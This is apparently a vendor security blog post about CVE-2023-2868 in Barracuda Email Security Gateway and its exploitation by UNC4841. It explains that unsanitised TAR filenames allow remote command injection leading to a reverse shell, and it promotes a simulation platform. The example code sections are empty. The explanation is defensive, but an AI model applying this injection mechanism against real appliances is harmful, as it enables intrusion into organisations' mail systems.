CVE-2023-2868: Barracuda ESG Vulnerability Actively Exploited by UNC4841

On July 28th, 2023, The Cybersecurity and Infrastructure Security Agence (CISA) released a security alert on a critical  remote command injection vulnerability found in Barracuda Email Security Gateway (ESG) [1]. CVE-2023-2868 is a zero-day vulnerability with a CVSS score of 9.8 (Critical) and has been exploited by the Chinese cyber threat group UNC4841 since October 2022.

In this blog, we explained how the Barracuda CVE-2023-2868 exploit works and the malware used by UNC4841.

Simulate Malware Attacks with 14-Day Free Trial of Picus Platform

What is Barracuda CVE-2023-2868 Command Injection Vulnerability?

Barracuda Email Security Gateway (ESG) is a security solution that investigates inbound and outbound email traffic for email-borne threats and data leaks. In May 2023, Barracuda disclosed that they found and patched a critical remote command injection vulnerability found in Barracuda ESG. CVE-2023-2868 is a zero-day vulnerability with a CVSS score of 9.8 (Critical), and the earliest evidence shows that it has been exploited since October 2022. Barracuda estimates that 5% of their 11000 devices worldwide are impacted.

Barracuda ESG versions from 5.1.3.001 to 9.2.0.006 are impacted. For mitigation, Barracuda urges users to isolate and replace impacted Barracuda ESG products. Users are recommended to rotate any credentials connected to the ESG appliance. To replace hardware versions of Barracuda ESG, Barracuda issued an RMA guidance.

How Does the Barracuda ESG CVE-2023-2868 Exploit Work?

CVE-2023-2868 is a command injection vulnerability that can be abused by adversaries to execute arbitrary commands remotely. The root cause of the vulnerability is an issue found in parsing logic for processing TAR files. Barracuda ESG uses the following Perl routine to execute the tarexec command as a system function. Since Barracuda ESG does not sanitize the user-controlled "$f" variable, adversaries were able to craft TAR files that allowed them to execute system commands with the ESG's privileges [2].

Example 1: Vulnerable Perl routine in Barracuda ESG

Initially, Barracuda released a patch to address the vulnerability on May 23rd, 2023. However, adversaries were able to circumvent the patch and continued to exploit the CVE-2023-2868 vulnerability. On May 31st, 2023, Barracuda advised their customers to isolate and replace impacted ESG products, regardless of patch level.

Chinese APT Group UNC4841

UNC4841 is a cyber espionage group, and their campaigns are mostly conducted in support of the Chinese government. Nearly half of the target organizations are located in the Americas, and a third of them are governmental organizations. Individuals working for a government or a research institute are also targeted as they are likely to be privy to political or strategic information. 

As an initial access vector, UNC4841 sends emails with malicious files crafted to exploit the CVE-2023-2868 vulnerability to victim organizations. The file extension of the malicious file can be TAR, JPG, or DAT. After the mail is delivered, the crafted malicious file exploits the CVE-2023-2868 vulnerability and executes a reverse shell payload.

Example 2: Reverse Shell Payload used by UNC4841

How Picus Helps Simulate Barracuda ESG CVE-2023-2868 RCE Attacks?

We also strongly suggest simulating Barracuda ESG CVE-2023-2868 vulnerability to test the effectiveness of your security controls against sophisticated cyber attacks using the Picus The Complete Security Validation Platform. You can also test your defenses against other vulnerability exploitation attacks, such as Log4Shell, ProxyNotShell, and Follina, within minutes with a 14-day free trial of the Picus Platform.

Picus Threat Library includes the following threats for Barracuda ESG CVE-2023-2868 vulnerability exploitation attacks:

Moreover, Picus Threat Library contains 300+ threats containing 3000+ web application and vulnerability exploitation attacks in addition to 1500+ endpoint, 8000+ malware, email and data exfiltration threats as of today.

Picus also provides actionable mitigation content. Picus Mitigation Library includes prevention signatures to address CVE-2023-2868 vulnerability exploitation attacks and related malware attacks in preventive security controls. Currently, Picus Labs validated the following signatures for CVE-2023-2868 vulnerability exploitation attacks:

Start simulating emerging threats today and get actionable mitigation insights with a  14-day free trial  of Picus The Complete Security Validation Platform.

References

[1] "CISA Releases Malware Analysis Reports on Barracuda Backdoors," Cybersecurity and Infrastructure Security Agency CISA. Available: https://www.cisa.gov/news-events/alerts/2023/07/28/cisa-releases-malware-analysis-reports-barracuda-backdoors. [Accessed: Jul. 31, 2023]

[2] "Barracuda ESG Zero-Day Vulnerability (CVE-2023-2868) Exploited Globally by Aggressive and Skilled Actor, Suspected Links to China," Mandiant, Oct. 03, 2021. Available: https://www.mandiant.com/resources/blog/barracuda-esg-exploited-globally. [Accessed: Jul. 31, 2023]